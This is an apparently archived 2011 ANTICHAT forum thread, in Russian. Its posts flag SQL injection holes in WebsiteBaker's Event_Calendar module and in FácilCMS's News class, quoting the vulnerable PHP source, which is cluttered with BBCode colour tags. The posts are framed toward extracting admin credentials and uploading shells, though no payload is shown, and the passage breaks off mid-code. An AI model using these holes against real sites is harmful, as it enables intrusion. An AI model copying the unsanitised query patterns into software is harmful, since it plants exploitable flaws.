ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.06.2011, 03:15
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
WebsiteBaker CMS
Уязвимый модуль : Event_Calendar
SQL Injection
/modules/event_calendar/details_popup.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$event_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'entry_id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT id,start_time,end_time,short_description,long_description,link_text,link_http,type FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"mod_event_calendar WHERE id =[/COLOR][COLOR="#0000BB"]$event_id[/COLOR][COLOR="#DD0000"];"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$query_entries[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$entry[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$query_entries[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetchRow[/COLOR][COLOR="#007700"]();[/COLOR][/COLOR]
дорк или метод заливка шелла не имеют смысла описать, все элементарно..
|
|
|
01.08.2011, 16:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
FácilCMS
sourceforge.net/projects/facil-cms
1. SQL-inj (достаем админа)
News.mysql.class.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] wagner.santos@dotlinux.com.br
* Celina Jorge -> celina.jorge@dotlinux.com.br
*
* ====================================================================
* Facil-CMS is Free Software. You can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by
* the Free Software Foundation (either version 2.0 of the license).
* ====================================================================
*/
[/COLOR][COLOR="#007700"]class[/COLOR][COLOR="#0000BB"]News
[/COLOR][COLOR="#007700"]{
var[/COLOR][COLOR="#0000BB"]$_ID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$_LANGUAGE[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$_TITLE[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$_RESUME[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$_CONTENT[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$_PUBLISHER[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$_DATE[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$_STATUS[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'0'[/COLOR][COLOR="#007700"];
function[/COLOR][COLOR="#0000BB"]__constructor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])
{
if([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getNewInfo[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);
}
}
function[/COLOR][COLOR="#0000BB"]News[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])
{
if([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getNewInfo[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);
}
}
function[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_ID[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setId[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_ID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getLanguage[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_LANGUAGE[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setLanguage[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_LANGUAGE[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getTitle[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_TITLE[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_TITLE[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getResume[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_RESUME[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setResume[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$resume[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_RESUME[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$resume[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getContent[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_CONTENT[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setContent[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_CONTENT[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getPublisher[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_PUBLISHER[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setPublisher[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$publisher[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_PUBLISHER[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$publisher[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getDate[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_DATE[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setDate[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_DATE[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getStatus[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_STATUS[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setStatus[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_STATUS[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getNewInfo[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_NEWS_DB_TABLE_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]Execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]ErrorMsg[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]RecordCount[/COLOR][COLOR="#007700"]() ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setContent[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'content'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setDate[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setId[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setLanguage[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'language'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setPublisher[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'publisher'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setResume[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'resume'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setStatus[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'status'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]));
return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
}
function[/COLOR][COLOR="#0000BB"]Add[/COLOR][COLOR="#007700"]()
{
if(![/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]())
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_NEWS_DB_TABLE_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" (id, language, title, resume, content, publisher, date, status) VALUES (null, '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getLanguage[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getTitle[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getResume[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getContent[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getPublisher[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]", NOW(), '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getStatus[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"')"[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]Execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]))
{
return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
else
{
die([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]ErrorMsg[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
}
}
}
function[/COLOR][COLOR="#0000BB"]Erase[/COLOR][COLOR="#007700"]()
{
if([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]())
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"DELETE FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_NEWS_DB_TABLE_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]();
if([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]Execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]))
{
return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
else
{
die([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]ErrorMsg[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
}
}
}
function[/COLOR][COLOR="#0000BB"]Update[/COLOR][COLOR="#007700"]()
{
if([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]())
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_NEWS_DB_TABLE_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" SET language='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getLanguage[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', title='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getTitle[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', resume='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getResume[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', content='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getContent[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', status='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getStatus[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"' WHERE id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]();
if([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]Execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]))
{
return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
else
{
die([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]ErrorMsg[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
}
}
}
function[/COLOR][COLOR="#0000BB"]countNews[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT COUNT(*) as Total FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_NEWS_DB_TABLE_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE status='1'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]Execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]ErrorMsg[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
return[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Total'[/COLOR][COLOR="#007700"]);
}
function[/COLOR][COLOR="#0000BB"]listNews[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$start[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])
{
if([/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]' language="'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'"'[/COLOR][COLOR="#007700"];
}
else
{
[/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
if(![/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'UTYPE'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'1'[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]" status='1'"[/COLOR][COLOR="#007700"];
}
else
{
[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
if([/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$where[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]' WHERE'[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$where[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"];
}
if([/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
{
if([/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$where[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]' AND'[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]$where[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"];
}
}
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_NEWS_DB_TABLE_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$where[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" ORDER BY date DESC LIMIT "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$start[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]", "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]Execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]ErrorMsg[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]RecordCount[/COLOR][COLOR="#007700"]() >[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]= array();
while(![/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]EOF[/COLOR][COLOR="#007700"])
{
